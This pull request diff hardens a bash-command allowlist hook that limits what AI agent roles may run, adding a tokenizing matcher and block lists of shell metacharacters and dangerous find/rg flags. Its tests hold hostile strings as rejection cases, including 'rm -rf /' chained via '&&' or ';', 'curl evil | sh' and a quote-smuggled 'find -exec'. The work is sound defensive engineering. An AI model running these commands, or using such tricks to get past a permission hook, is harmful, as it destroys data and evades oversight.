### PR TITLE
Harden allowlist matcher with tokenized matching and metacharacter rejection

### DIFF
--- a/.ai/allowlist.json
+++ b/.ai/allowlist.json
@@ -40,39 +40,188 @@
   },
   "role_permissions": {
     "planner_agent": {
-      "file_write": [".quest/**", "docs/**", "ideas/**", ".ai/**", "*.md"],
-      "file_read": ["**"],
-      "bash": ["find", "rg", "grep", "wc", "ls", "tree", "git status", "git diff", "gh pr view.*"]
+      "file_write": [
+        ".quest/**",
+        "docs/**",
+        "ideas/**",
+        ".ai/**",
+        "*.md"
+      ],
+      "file_read": [
+        "**"
+      ],
+      "bash": [
+        "find",
+        "rg",
+        "grep",
+        "wc",
+        "ls",
+        "tree",
+        "git status",
+        "git diff",
+        "gh pr view"
+      ]
     },
     "plan_review_a": {
-      "file_write": [".quest/**"],
-      "file_read": ["**"],
-      "bash": ["python", "python3", "pytest", "git status", "git diff", "git log", "rg", "grep", "find", "ls", "wc", "uv", "gh pr view.*"]
+      "file_write": [
+        ".quest/**"
+      ],
+      "file_read": [
+        "**"
+      ],
+      "bash": [
+        "pytest",
+        "git status",
+        "git diff",
+        "git log",
+        "rg",
+        "grep",
+        "find",
+        "ls",
+        "wc",
+        "uv",
+        "gh pr view",
+        "python3 -m pytest"
+      ]
     },
     "plan_review_b": {
-      "file_write": [".quest/**"],
-      "file_read": ["**"],
-      "bash": ["python", "python3", "pytest", "git status", "git diff", "git log", "rg", "grep", "find", "ls", "wc", "uv", "gh pr view.*"]
+      "file_write": [
+        ".quest/**"
+      ],
+      "file_read": [
+        "**"
+      ],
+      "bash": [
+        "pytest",
+        "git status",
+        "git diff",
+        "git log",
+        "rg",
+        "grep",
+        "find",
+        "ls",
+        "wc",
+        "uv",
+        "gh pr view",
+        "python3 -m pytest"
+      ]
     },
     "arbiter_agent": {
-      "file_write": [".quest/**"],
-      "file_read": ["**"],
-      "bash": ["git status", "git diff", "gh pr view.*"]
+      "file_write": [
+        ".quest/**"
+      ],
+      "file_read": [
+        "**"
+      ],
+      "bash": [
+        "git status",
+        "git diff",
+        "gh pr view"
+      ]
     },
     "builder_agent": {
-      "file_write": [".quest/**", ".ai/**", ".github/**", "docs/**", "ideas/**", "scripts/**", "tests/**", ".skills/**", "*.md", "*.json", "*.txt", "*.sh", "*.py"],
-      "file_read": ["**"],
-      "bash": ["python", "python3", "python3 -m unittest", "pytest", "bash", "git status", "git diff", "git log", "npm test", "rg", "grep", "find", "ls", "wc"]
+      "file_write": [
+        ".quest/**",
+        ".ai/**",
+        ".github/**",
+        "docs/**",
+        "ideas/**",
+        "scripts/**",
+        "tests/**",
+        ".skills/**",
+        "*.md",
+        "*.json",
+        "*.txt",
+        "*.sh",
+        "*.py"
+      ],
+      "file_read": [
+        "**"
+      ],
+      "bash": [
+        "python3 -m unittest",
+        "pytest",
+        "git status",
+        "git diff",
+        "git log",
+        "npm test",
+        "rg",
+        "grep",
+        "find",
+        "ls",
+        "wc",
+        "python3 -m pytest",
+        "bash scripts/quest_validate-manifest.sh",
+        "bash scripts/quest_validate-quest-config.sh",
+        "bash scripts/quest_validate-quest-state.sh",
+        "bash tests/test-quest-preflight.sh",
+        "bash tests/test-quest-runtime.sh",
+        "bash tests/test-validate-handoff-contracts.sh",
+        "bash tests/test-validate-quest-state.sh"
+      ]
     },
     "code_review_agent": {
-      "file_write": [".quest/**"],
-      "file_read": ["**"],
-      "bash": ["python", "python3", "pytest", "git diff", "git log", "git status", "rg", "grep", "find", "ls", "wc", "uv", "gh pr view.*"]
+      "file_write": [
+        ".quest/**"
+      ],
+      "file_read": [
+        "**"
+      ],
+      "bash": [
+        "pytest",
+        "git diff",
+        "git log",
+        "git status",
+        "rg",
+        "grep",
+        "find",
+        "ls",
+        "wc",
+        "uv",
+        "gh pr view",
+        "python3 -m pytest"
+      ]
     },
     "fixer_agent": {
-      "file_write": [".quest/**", ".ai/**", ".github/**", "docs/**", "ideas/**", "scripts/**", "tests/**", ".skills/**", "*.md", "*.json", "*.txt", "*.sh", "*.py"],
-      "file_read": ["**"],
-      "bash": ["python", "python3", "python3 -m unittest", "pytest", "bash", "git status", "git diff", "git log", "npm test", "rg", "grep", "find", "ls", "wc"]
+      "file_write": [
+        ".quest/**",
+        ".ai/**",
+        ".github/**",
+        "docs/**",
+        "ideas/**",
+        "scripts/**",
+        "tests/**",
+        ".skills/**",
+        "*.md",
+        "*.json",
+        "*.txt",
+        "*.sh",
+        "*.py"
+      ],
+      "file_read": [
+        "**"
+      ],
+      "bash": [
+        "python3 -m unittest",
+        "pytest",
+        "git status",
+        "git diff",
+        "git log",
+        "npm test",
+        "rg",
+        "grep",
+        "find",
+        "ls",
+        "wc",
+        "python3 -m pytest",
+        "bash scripts/quest_validate-manifest.sh",
+        "bash scripts/quest_validate-quest-config.sh",
+        "bash scripts/quest_validate-quest-state.sh",
+        "bash tests/test-quest-preflight.sh",
+        "bash tests/test-quest-runtime.sh",
+        "bash tests/test-validate-handoff-contracts.sh",
+        "bash tests/test-validate-quest-state.sh"
+      ]
     }
   },
   "solo": {

--- a/.ai/allowlist.json
+++ b/.ai/allowlist.json
@@ -79,7 +79,7 @@
         "find",
         "ls",
         "wc",
-        "uv",
+        "uv run pytest",
         "gh pr view",
         "python3 -m pytest"
       ]
@@ -101,7 +101,7 @@
         "find",
         "ls",
         "wc",
-        "uv",
+        "uv run pytest",
         "gh pr view",
         "python3 -m pytest"
       ]
@@ -177,7 +177,7 @@
         "find",
         "ls",
         "wc",
-        "uv",
+        "uv run pytest",
         "gh pr view",
         "python3 -m pytest"
       ]

--- a/.claude/hooks/enforce-allowlist.sh
+++ b/.claude/hooks/enforce-allowlist.sh
@@ -10,6 +10,7 @@ set -euo pipefail
 ROLE="${1:-}"
 REPO_ROOT="$(cd "$(dirname "$0")/../.." && pwd)"
 ALLOWLIST="$REPO_ROOT/.ai/allowlist.json"
+MATCHER="$REPO_ROOT/scripts/quest_allowlist_matcher.py"
 
 # No role specified = allow (hook misconfigured, don't block)
 [[ -z "$ROLE" ]] && exit 0
@@ -62,25 +63,20 @@ check_file_write() {
 # Check bash command permissions
 check_bash() {
   local command="$1"
-  local allowed_commands
+  local allowed_commands_json
+  local matcher_output
 
-  # Get allowed bash commands as array
-  allowed_commands=$(echo "$PERMS" | jq -r '.bash // [] | .[]')
+  # Get allowed bash commands as JSON array
+  allowed_commands_json=$(echo "$PERMS" | jq -c '.bash // []')
+  [[ "$allowed_commands_json" == "[]" ]] && return 1
 
-  # Empty bash list = no bash allowed
-  [[ -z "$allowed_commands" ]] && return 1
+  matcher_output=$(python3 "$MATCHER" --command "$command" --allow "$allowed_commands_json" 2>&1) || {
+    CHECK_BASH_REASON="$matcher_output"
+    return 1
+  }
 
-  # Check if command starts with any allowed prefix
-  while IFS= read -r allowed; do
-    [[ -z "$allowed" ]] && continue
-
-    # Check if command starts with the allowed prefix
-    if [[ "$command" == "$allowed"* ]]; then
-      return 0  # Match found, allow
-    fi
-  done <<< "$allowed_commands"
-
-  return 1  # No match, deny
+  CHECK_BASH_REASON=""
+  return 0
 }
 
 case "$TOOL" in
@@ -101,6 +97,9 @@ case "$TOOL" in
 
     if ! check_bash "$COMMAND"; then
       echo "BLOCKED: $ROLE cannot run: $COMMAND" >&2
+      if [[ -n "${CHECK_BASH_REASON:-}" ]]; then
+        echo "Reason: $CHECK_BASH_REASON" >&2
+      fi
       echo "Allowed commands: $(echo "$PERMS" | jq -r '.bash | join(", ")')" >&2
       exit 2
     fi

--- a/.quest-manifest
+++ b/.quest-manifest
@@ -100,6 +100,8 @@ scripts/quest_backfill_journal.py
 scripts/quest_complete.py
 scripts/quest_preflight.sh
 scripts/quest_state.py
+tests/integration/test-enforce-allowlist.sh
+tests/unit/test_allowlist_matcher.py
 tests/unit/test_review_intelligence.py
 tests/unit/test_codex_skill_wrappers.py
 

--- a/.quest-manifest
+++ b/.quest-manifest
@@ -75,6 +75,7 @@ scripts/quest_validate-handoff-contracts.sh
 scripts/quest_claude_bridge.py
 scripts/quest_claude_probe.py
 scripts/quest_claude_runner.py
+scripts/quest_allowlist_matcher.py
 scripts/quest_review_intelligence.py
 scripts/quest_select_tests.py
 scripts/quest_startup_branch.py

--- a/scripts/quest_allowlist_matcher.py
+++ b/scripts/quest_allowlist_matcher.py
@@ -1,7 +1,9 @@
 #!/usr/bin/env python3
 """Quest allowlist matcher for bash commands.
 
-Rejected metacharacters for non-exact matches: &&, ||, ;, |, &, `, $(), >(, <(, \n, \r.
+Rejected metacharacters for non-exact matches: &&, ||, ;, |, &, `, $(),
+>(, <(, >, >>, 2>, <, \n, \r. Exact-match allowlist entries still work
+for commands that legitimately need redirection.
 """
 
 from __future__ import annotations
@@ -10,7 +12,23 @@ import argparse
 import json
 import sys
 
-BLOCKED_METACHARACTERS = ("&&", "||", ";", "|", "&", "`", "$(", ">(", "<(", "\n", "\r")
+BLOCKED_METACHARACTERS = (
+    "&&",
+    "||",
+    ";",
+    "|",
+    "&",
+    "`",
+    "$(",
+    ">(",
+    "<(",
+    ">>",
+    ">",
+    "2>",
+    "<",
+    "\n",
+    "\r",
+)
 EXACT_ONLY_BARE_ENTRIES = {"bash", "python", "python3"}
 
 

--- a/scripts/quest_allowlist_matcher.py
+++ b/scripts/quest_allowlist_matcher.py
@@ -12,6 +12,7 @@ from __future__ import annotations
 
 import argparse
 import json
+import shlex
 import sys
 
 BLOCKED_METACHARACTERS = (
@@ -50,15 +51,20 @@ def contains_blocked_shell_metacharacters(command: str) -> bool:
     return any(token in command for token in BLOCKED_METACHARACTERS)
 
 
-def contains_blocked_find_action(command: str) -> bool:
-    command_tokens = command.split()
+def shell_tokens(command: str) -> list[str] | None:
+    try:
+        return shlex.split(command, posix=True)
+    except ValueError:
+        return None
+
+
+def contains_blocked_find_action(command_tokens: list[str]) -> bool:
     if not command_tokens or command_tokens[0] != "find":
         return False
     return any(token in BLOCKED_FIND_ACTIONS for token in command_tokens[1:])
 
 
-def contains_blocked_rg_flag(command: str) -> bool:
-    command_tokens = command.split()
+def contains_blocked_rg_flag(command_tokens: list[str]) -> bool:
     if not command_tokens or command_tokens[0] != "rg":
         return False
     return any(
@@ -68,15 +74,16 @@ def contains_blocked_rg_flag(command: str) -> bool:
     )
 
 
-def token_prefix_matches(command: str, entry: str) -> bool:
-    command_tokens = command.split()
-    entry_tokens = entry.split()
+def token_prefix_matches(command_tokens: list[str], entry: str) -> bool:
+    entry_tokens = shell_tokens(entry)
+    if entry_tokens is None:
+        return False
     if not entry_tokens:
         return False
     if (
         len(entry_tokens) == 1
         and entry_tokens[0] in EXACT_ONLY_BARE_ENTRIES
-        and command.strip() != entry_tokens[0]
+        and command_tokens != entry_tokens
     ):
         return False
     if len(command_tokens) < len(entry_tokens):
@@ -91,14 +98,18 @@ def is_bash_command_allowed(command: str, allowed_entries: list[str]) -> tuple[b
     if contains_blocked_shell_metacharacters(command):
         return False, "blocked_metacharacter"
 
-    if contains_blocked_find_action(command):
+    command_tokens = shell_tokens(command)
+    if command_tokens is None:
+        return False, "invalid_shell_syntax"
+
+    if contains_blocked_find_action(command_tokens):
         return False, "blocked_find_action"
 
-    if contains_blocked_rg_flag(command):
+    if contains_blocked_rg_flag(command_tokens):
         return False, "blocked_rg_flag"
 
     for entry in allowed_entries:
-        if token_prefix_matches(command, entry):
+        if token_prefix_matches(command_tokens, entry):
             return True, "token_prefix_match"
 
     return False, "no_match"

--- a/scripts/quest_allowlist_matcher.py
+++ b/scripts/quest_allowlist_matcher.py
@@ -1,0 +1,86 @@
+#!/usr/bin/env python3
+"""Quest allowlist matcher for bash commands.
+
+Rejected metacharacters for non-exact matches: &&, ||, ;, |, &, `, $(), >(, <(, \n, \r.
+"""
+
+from __future__ import annotations
+
+import argparse
+import json
+import sys
+
+BLOCKED_METACHARACTERS = ("&&", "||", ";", "|", "&", "`", "$(", ">(", "<(", "\n", "\r")
+EXACT_ONLY_BARE_ENTRIES = {"bash", "python", "python3"}
+
+
+def contains_blocked_shell_metacharacters(command: str) -> bool:
+    return any(token in command for token in BLOCKED_METACHARACTERS)
+
+
+def token_prefix_matches(command: str, entry: str) -> bool:
+    command_tokens = command.split()
+    entry_tokens = entry.split()
+    if not entry_tokens:
+        return False
+    if (
+        len(entry_tokens) == 1
+        and entry_tokens[0] in EXACT_ONLY_BARE_ENTRIES
+        and command.strip() != entry_tokens[0]
+    ):
+        return False
+    if len(command_tokens) < len(entry_tokens):
+        return False
+    return command_tokens[: len(entry_tokens)] == entry_tokens
+
+
+def is_bash_command_allowed(command: str, allowed_entries: list[str]) -> tuple[bool, str]:
+    if command in allowed_entries:
+        return True, "exact_match"
+
+    if contains_blocked_shell_metacharacters(command):
+        return False, "blocked_metacharacter"
+
+    for entry in allowed_entries:
+        if token_prefix_matches(command, entry):
+            return True, "token_prefix_match"
+
+    return False, "no_match"
+
+
+def _parse_args() -> argparse.Namespace:
+    parser = argparse.ArgumentParser(description="Quest bash allowlist matcher")
+    parser.add_argument("--command", required=True, help="Raw command string to evaluate")
+    parser.add_argument(
+        "--allow",
+        required=True,
+        help="JSON array of allowlist entries (strings)",
+    )
+    return parser.parse_args()
+
+
+def main() -> int:
+    args = _parse_args()
+
+    try:
+        parsed_entries = json.loads(args.allow)
+    except json.JSONDecodeError:
+        print("invalid_allowlist_json", file=sys.stderr)
+        return 2
+
+    if not isinstance(parsed_entries, list) or not all(
+        isinstance(item, str) for item in parsed_entries
+    ):
+        print("invalid_allowlist_entries", file=sys.stderr)
+        return 2
+
+    allowed, reason = is_bash_command_allowed(args.command, parsed_entries)
+    if allowed:
+        return 0
+
+    print(reason, file=sys.stderr)
+    return 2
+
+
+if __name__ == "__main__":
+    raise SystemExit(main())

--- a/scripts/quest_allowlist_matcher.py
+++ b/scripts/quest_allowlist_matcher.py
@@ -3,8 +3,9 @@
 
 Rejected metacharacters for non-exact matches: &&, ||, ;, |, &, `, $(),
 >(, <(, >, >>, 2>, <, \n, \r. Non-exact find commands also reject
-execution/write primaries such as -exec and -delete. Exact-match allowlist
-entries still work for commands that intentionally need these forms.
+execution/write primaries such as -exec and -delete; non-exact rg commands
+reject preprocessor flags. Exact-match allowlist entries still work for
+commands that intentionally need these forms.
 """
 
 from __future__ import annotations
@@ -42,6 +43,7 @@ BLOCKED_FIND_ACTIONS = {
     "-ok",
     "-okdir",
 }
+BLOCKED_RG_FLAGS = {"--pre", "--pre-glob"}
 
 
 def contains_blocked_shell_metacharacters(command: str) -> bool:
@@ -53,6 +55,17 @@ def contains_blocked_find_action(command: str) -> bool:
     if not command_tokens or command_tokens[0] != "find":
         return False
     return any(token in BLOCKED_FIND_ACTIONS for token in command_tokens[1:])
+
+
+def contains_blocked_rg_flag(command: str) -> bool:
+    command_tokens = command.split()
+    if not command_tokens or command_tokens[0] != "rg":
+        return False
+    return any(
+        token in BLOCKED_RG_FLAGS
+        or any(token.startswith(f"{flag}=") for flag in BLOCKED_RG_FLAGS)
+        for token in command_tokens[1:]
+    )
 
 
 def token_prefix_matches(command: str, entry: str) -> bool:
@@ -80,6 +93,9 @@ def is_bash_command_allowed(command: str, allowed_entries: list[str]) -> tuple[b
 
     if contains_blocked_find_action(command):
         return False, "blocked_find_action"
+
+    if contains_blocked_rg_flag(command):
+        return False, "blocked_rg_flag"
 
     for entry in allowed_entries:
         if token_prefix_matches(command, entry):

--- a/scripts/quest_allowlist_matcher.py
+++ b/scripts/quest_allowlist_matcher.py
@@ -2,8 +2,9 @@
 """Quest allowlist matcher for bash commands.
 
 Rejected metacharacters for non-exact matches: &&, ||, ;, |, &, `, $(),
->(, <(, >, >>, 2>, <, \n, \r. Exact-match allowlist entries still work
-for commands that legitimately need redirection.
+>(, <(, >, >>, 2>, <, \n, \r. Non-exact find commands also reject
+execution/write primaries such as -exec and -delete. Exact-match allowlist
+entries still work for commands that intentionally need these forms.
 """
 
 from __future__ import annotations
@@ -30,10 +31,28 @@ BLOCKED_METACHARACTERS = (
     "\r",
 )
 EXACT_ONLY_BARE_ENTRIES = {"bash", "python", "python3"}
+BLOCKED_FIND_ACTIONS = {
+    "-delete",
+    "-exec",
+    "-execdir",
+    "-fprint",
+    "-fprint0",
+    "-fls",
+    "-fprintf",
+    "-ok",
+    "-okdir",
+}
 
 
 def contains_blocked_shell_metacharacters(command: str) -> bool:
     return any(token in command for token in BLOCKED_METACHARACTERS)
+
+
+def contains_blocked_find_action(command: str) -> bool:
+    command_tokens = command.split()
+    if not command_tokens or command_tokens[0] != "find":
+        return False
+    return any(token in BLOCKED_FIND_ACTIONS for token in command_tokens[1:])
 
 
 def token_prefix_matches(command: str, entry: str) -> bool:
@@ -58,6 +77,9 @@ def is_bash_command_allowed(command: str, allowed_entries: list[str]) -> tuple[b
 
     if contains_blocked_shell_metacharacters(command):
         return False, "blocked_metacharacter"
+
+    if contains_blocked_find_action(command):
+        return False, "blocked_find_action"
 
     for entry in allowed_entries:
         if token_prefix_matches(command, entry):

--- a/scripts/quest_validate-manifest.sh
+++ b/scripts/quest_validate-manifest.sh
@@ -48,6 +48,7 @@ EXPECTED_PATTERNS=(
   ".claude/agents/*.md"
   ".claude/hooks/*.sh"
   ".claude/skills/*/*.md"
+  "scripts/quest_allowlist_matcher.py"
   "scripts/quest_claude_bridge.py"
   "scripts/quest_claude_probe.py"
   "scripts/quest_claude_runner.py"

--- a/scripts/quest_validate-manifest.sh
+++ b/scripts/quest_validate-manifest.sh
@@ -61,6 +61,8 @@ EXPECTED_PATTERNS=(
   "scripts/quest_validate-quest-state.sh"
   "scripts/quest_checks/*.py"
   "scripts/quest_runtime/*.py"
+  "tests/integration/test-enforce-allowlist.sh"
+  "tests/unit/test_allowlist_matcher.py"
 )
 
 # Find all files matching our patterns

--- a/tests/integration/test-enforce-allowlist.sh
+++ b/tests/integration/test-enforce-allowlist.sh
@@ -1,0 +1,65 @@
+#!/usr/bin/env bash
+# Integration tests for .claude/hooks/enforce-allowlist.sh bash->python bridge.
+# Run: bash tests/integration/test-enforce-allowlist.sh
+
+set -uo pipefail
+
+REPO_ROOT="$(git rev-parse --show-toplevel 2>/dev/null || pwd)"
+HOOK_SCRIPT="$REPO_ROOT/.claude/hooks/enforce-allowlist.sh"
+
+TESTS_RUN=0
+TESTS_PASSED=0
+TESTS_FAILED=0
+
+run_test() {
+  local name="$1"
+  TESTS_RUN=$((TESTS_RUN + 1))
+  if "$name"; then
+    TESTS_PASSED=$((TESTS_PASSED + 1))
+    echo "[PASS] $name"
+  else
+    TESTS_FAILED=$((TESTS_FAILED + 1))
+    echo "[FAIL] $name"
+  fi
+}
+
+run_hook_for_command() {
+  local role="$1"
+  local command="$2"
+  local payload
+  payload=$(jq -cn --arg cmd "$command" '{tool:"Bash",input:{command:$cmd}}')
+  printf '%s' "$payload" | "$HOOK_SCRIPT" "$role"
+}
+
+test_bridge_allows_manifest_validation_command() {
+  local output rc
+  output=$(run_hook_for_command "builder_agent" "bash scripts/quest_validate-manifest.sh" 2>&1)
+  rc=$?
+  [ "$rc" -eq 0 ] && [ -z "$output" ]
+}
+
+test_bridge_rejects_compound_bypass() {
+  local output rc
+  output=$(run_hook_for_command "builder_agent" "python3 -m pytest && rm -rf /" 2>&1)
+  rc=$?
+  [ "$rc" -eq 2 ] &&
+    echo "$output" | grep -q "BLOCKED:" &&
+    echo "$output" | grep -q "blocked_metacharacter"
+}
+
+if [ ! -x "$HOOK_SCRIPT" ]; then
+  echo "[SKIP] Hook script is missing or not executable: $HOOK_SCRIPT"
+  exit 0
+fi
+
+run_test test_bridge_allows_manifest_validation_command
+run_test test_bridge_rejects_compound_bypass
+
+echo ""
+echo "Tests run: $TESTS_RUN"
+echo "Passed:    $TESTS_PASSED"
+echo "Failed:    $TESTS_FAILED"
+
+if [ "$TESTS_FAILED" -ne 0 ]; then
+  exit 1
+fi

--- a/tests/unit/test_allowlist_matcher.py
+++ b/tests/unit/test_allowlist_matcher.py
@@ -173,6 +173,49 @@ def test_exact_find_exec_entry_is_allowed():
     assert reason == "exact_match"
 
 
+def test_read_only_rg_query_is_allowed_for_bare_rg_entry():
+    allowed, reason = is_bash_command_allowed(
+        "rg TODO tests/unit/",
+        ["rg"],
+    )
+    assert allowed is True
+    assert reason == "token_prefix_match"
+
+
+def test_rg_pre_is_blocked_for_bare_rg_entry():
+    allowed, reason = is_bash_command_allowed(
+        "rg --pre sh TODO",
+        ["rg"],
+    )
+    assert allowed is False
+    assert reason == "blocked_rg_flag"
+
+
+def test_rg_pre_equals_form_is_blocked_for_bare_rg_entry():
+    allowed, reason = is_bash_command_allowed(
+        "rg --pre=sh TODO",
+        ["rg"],
+    )
+    assert allowed is False
+    assert reason == "blocked_rg_flag"
+
+
+def test_rg_pre_glob_is_blocked_for_bare_rg_entry():
+    allowed, reason = is_bash_command_allowed(
+        "rg --pre-glob '*.md' TODO",
+        ["rg"],
+    )
+    assert allowed is False
+    assert reason == "blocked_rg_flag"
+
+
+def test_exact_rg_pre_entry_is_allowed():
+    command = "rg --pre cat TODO"
+    allowed, reason = is_bash_command_allowed(command, [command])
+    assert allowed is True
+    assert reason == "exact_match"
+
+
 def test_pipeline_spot_checks_allow_expected_commands():
     entries = [
         "bash scripts/quest_validate-manifest.sh",

--- a/tests/unit/test_allowlist_matcher.py
+++ b/tests/unit/test_allowlist_matcher.py
@@ -139,6 +139,40 @@ def test_bare_token_rejection_for_bash_entry():
     assert reason == "no_match"
 
 
+def test_read_only_find_query_is_allowed_for_bare_find_entry():
+    allowed, reason = is_bash_command_allowed(
+        "find . -name '*.py' -type f",
+        ["find"],
+    )
+    assert allowed is True
+    assert reason == "token_prefix_match"
+
+
+def test_find_exec_is_blocked_for_bare_find_entry():
+    allowed, reason = is_bash_command_allowed(
+        "find . -name '*.py' -exec rm {} +",
+        ["find"],
+    )
+    assert allowed is False
+    assert reason == "blocked_find_action"
+
+
+def test_find_delete_is_blocked_for_bare_find_entry():
+    allowed, reason = is_bash_command_allowed(
+        "find . -name '*.tmp' -delete",
+        ["find"],
+    )
+    assert allowed is False
+    assert reason == "blocked_find_action"
+
+
+def test_exact_find_exec_entry_is_allowed():
+    command = "find . -name '*.py' -exec echo {} +"
+    allowed, reason = is_bash_command_allowed(command, [command])
+    assert allowed is True
+    assert reason == "exact_match"
+
+
 def test_pipeline_spot_checks_allow_expected_commands():
     entries = [
         "bash scripts/quest_validate-manifest.sh",

--- a/tests/unit/test_allowlist_matcher.py
+++ b/tests/unit/test_allowlist_matcher.py
@@ -157,3 +157,69 @@ def test_pipeline_spot_checks_allow_expected_commands():
         True,
         "token_prefix_match",
     )
+
+
+def test_stdout_redirection_is_blocked() -> None:
+    from quest_allowlist_matcher import is_bash_command_allowed
+
+    # git diff is allowlisted; redirection into a file must NOT pass.
+    allowed, reason = is_bash_command_allowed("git diff > AGENTS.md", ["git diff"])
+    assert allowed is False
+    assert reason == "blocked_metacharacter"
+
+
+def test_stdout_append_redirection_is_blocked() -> None:
+    from quest_allowlist_matcher import is_bash_command_allowed
+
+    allowed, reason = is_bash_command_allowed(
+        "git log >> /tmp/log", ["git log"]
+    )
+    assert allowed is False
+    assert reason == "blocked_metacharacter"
+
+
+def test_stderr_redirection_is_blocked() -> None:
+    from quest_allowlist_matcher import is_bash_command_allowed
+
+    allowed, reason = is_bash_command_allowed(
+        "python3 -m pytest 2> /tmp/err", ["python3 -m pytest"]
+    )
+    assert allowed is False
+    assert reason == "blocked_metacharacter"
+
+
+def test_stdin_redirection_is_blocked() -> None:
+    from quest_allowlist_matcher import is_bash_command_allowed
+
+    allowed, reason = is_bash_command_allowed(
+        "bash scripts/quest_validate-manifest.sh < /tmp/input",
+        ["bash scripts/quest_validate-manifest.sh"],
+    )
+    assert allowed is False
+    assert reason == "blocked_metacharacter"
+
+
+def test_bare_uv_is_rejected_for_arbitrary_run() -> None:
+    from quest_allowlist_matcher import is_bash_command_allowed
+
+    # Allowlist now only contains 'uv run pytest' (3 tokens).
+    # 'uv run python <path>' must NOT pass via token-prefix match because
+    # the 3rd token differs (python vs pytest). Use a metachar-free
+    # payload so the rejection reason is specifically the token mismatch
+    # rather than the metacharacter guard.
+    allowed, reason = is_bash_command_allowed(
+        "uv run python tools/check_health.py",
+        ["uv run pytest"],
+    )
+    assert allowed is False
+    assert reason == "no_match"
+
+
+def test_uv_run_pytest_prefix_still_works() -> None:
+    from quest_allowlist_matcher import is_bash_command_allowed
+
+    allowed, reason = is_bash_command_allowed(
+        "uv run pytest tests/unit/", ["uv run pytest"]
+    )
+    assert allowed is True
+    assert reason == "token_prefix_match"

--- a/tests/unit/test_allowlist_matcher.py
+++ b/tests/unit/test_allowlist_matcher.py
@@ -1,0 +1,159 @@
+import pytest
+
+from quest_allowlist_matcher import is_bash_command_allowed
+
+
+def test_rejects_bare_bash_when_not_allowlisted():
+    allowed, reason = is_bash_command_allowed(
+        "bash -c 'rm -rf /'",
+        ["bash scripts/quest_validate-manifest.sh"],
+    )
+    assert allowed is False
+    assert reason == "no_match"
+
+
+def test_allows_exact_bash_manifest_command():
+    allowed, reason = is_bash_command_allowed(
+        "bash scripts/quest_validate-manifest.sh",
+        ["bash scripts/quest_validate-manifest.sh"],
+    )
+    assert allowed is True
+    assert reason == "exact_match"
+
+
+def test_rejects_manifest_command_with_compound_suffix():
+    allowed, reason = is_bash_command_allowed(
+        "bash scripts/quest_validate-manifest.sh && rm -rf /",
+        ["bash scripts/quest_validate-manifest.sh"],
+    )
+    assert allowed is False
+    assert reason == "blocked_metacharacter"
+
+
+def test_rejects_other_bash_script_for_manifest_entry():
+    allowed, reason = is_bash_command_allowed(
+        "bash scripts/other.sh",
+        ["bash scripts/quest_validate-manifest.sh"],
+    )
+    assert allowed is False
+    assert reason == "no_match"
+
+
+def test_git_status_token_prefix_behavior():
+    entries = ["git status"]
+    assert is_bash_command_allowed("git status", entries) == (True, "exact_match")
+    assert is_bash_command_allowed("git status --short", entries) == (
+        True,
+        "token_prefix_match",
+    )
+    assert is_bash_command_allowed("git statuss", entries) == (False, "no_match")
+
+
+def test_python3_pytest_token_prefix_behavior():
+    entries = ["python3 -m pytest"]
+    assert is_bash_command_allowed("python3 -m pytest tests/unit/", entries) == (
+        True,
+        "token_prefix_match",
+    )
+    assert is_bash_command_allowed("python3 -m other", entries) == (False, "no_match")
+
+
+def test_gh_pr_view_token_prefix_behavior():
+    entries = ["gh pr view"]
+    assert is_bash_command_allowed("gh pr view 123", entries) == (
+        True,
+        "token_prefix_match",
+    )
+    assert is_bash_command_allowed("gh pr view 94 --json", entries) == (
+        True,
+        "token_prefix_match",
+    )
+    assert is_bash_command_allowed("gh pr viewall", entries) == (False, "no_match")
+
+
+@pytest.mark.parametrize(
+    "candidate",
+    [
+        "python3 -m pytest tests/unit/ && rm -rf /",
+        "python3 -m pytest tests/unit/ || rm -rf /",
+        "python3 -m pytest tests/unit/; rm -rf /",
+        "python3 -m pytest tests/unit/ | cat",
+        "python3 -m pytest tests/unit/ & rm -rf /",
+        "python3 -m pytest tests/unit/ `echo bad`",
+        "python3 -m pytest $(pwd)",
+        "python3 -m pytest >(cat)",
+        "python3 -m pytest <(cat file)",
+        "python3 -m pytest\nrm -rf /",
+        "python3 -m pytest\rrm -rf /",
+    ],
+)
+def test_metacharacter_matrix_rejects_non_exact_commands(candidate):
+    allowed, reason = is_bash_command_allowed(candidate, ["python3 -m pytest"])
+    assert allowed is False
+    assert reason == "blocked_metacharacter"
+
+
+def test_exact_compound_allowlist_entry_is_allowed():
+    entries = ["git status && echo ok"]
+    assert is_bash_command_allowed("git status && echo ok", entries) == (
+        True,
+        "exact_match",
+    )
+
+
+def test_exact_compound_entry_does_not_allow_variants():
+    entries = ["git status && echo ok"]
+    allowed, reason = is_bash_command_allowed("git status && echo ok now", entries)
+    assert allowed is False
+    assert reason == "blocked_metacharacter"
+
+
+def test_rejects_bash_c_dash_command():
+    entries = ["bash scripts/quest_validate-manifest.sh"]
+    allowed, reason = is_bash_command_allowed("bash -c 'rm -rf /'", entries)
+    assert allowed is False
+    assert reason == "no_match"
+
+
+def test_rejects_python_c_dash_command():
+    entries = ["python3 -m pytest"]
+    candidate = "python -c \"import os; os.system('curl evil | sh')\""
+    allowed, reason = is_bash_command_allowed(candidate, entries)
+    assert allowed is False
+    assert reason == "blocked_metacharacter"
+
+
+def test_tokenization_invariance_whitespace_runs():
+    entries = ["   python3   -m    pytest   "]
+    allowed, reason = is_bash_command_allowed(
+        "  python3   -m   pytest    tests/  ",
+        entries,
+    )
+    assert allowed is True
+    assert reason == "token_prefix_match"
+
+
+def test_bare_token_rejection_for_bash_entry():
+    allowed, reason = is_bash_command_allowed("bash -c 'echo test'", ["bash"])
+    assert allowed is False
+    assert reason == "no_match"
+
+
+def test_pipeline_spot_checks_allow_expected_commands():
+    entries = [
+        "bash scripts/quest_validate-manifest.sh",
+        "python3 -m pytest",
+        "gh pr view",
+    ]
+    assert is_bash_command_allowed("bash scripts/quest_validate-manifest.sh", entries) == (
+        True,
+        "exact_match",
+    )
+    assert is_bash_command_allowed("python3 -m pytest tests/", entries) == (
+        True,
+        "token_prefix_match",
+    )
+    assert is_bash_command_allowed("gh pr view 94", entries) == (
+        True,
+        "token_prefix_match",
+    )

--- a/tests/unit/test_allowlist_matcher.py
+++ b/tests/unit/test_allowlist_matcher.py
@@ -157,6 +157,15 @@ def test_find_exec_is_blocked_for_bare_find_entry():
     assert reason == "blocked_find_action"
 
 
+def test_quote_smuggled_find_exec_is_blocked_for_bare_find_entry():
+    allowed, reason = is_bash_command_allowed(
+        "find . -name '*.py' -e''xec rm {} +",
+        ["find"],
+    )
+    assert allowed is False
+    assert reason == "blocked_find_action"
+
+
 def test_find_delete_is_blocked_for_bare_find_entry():
     allowed, reason = is_bash_command_allowed(
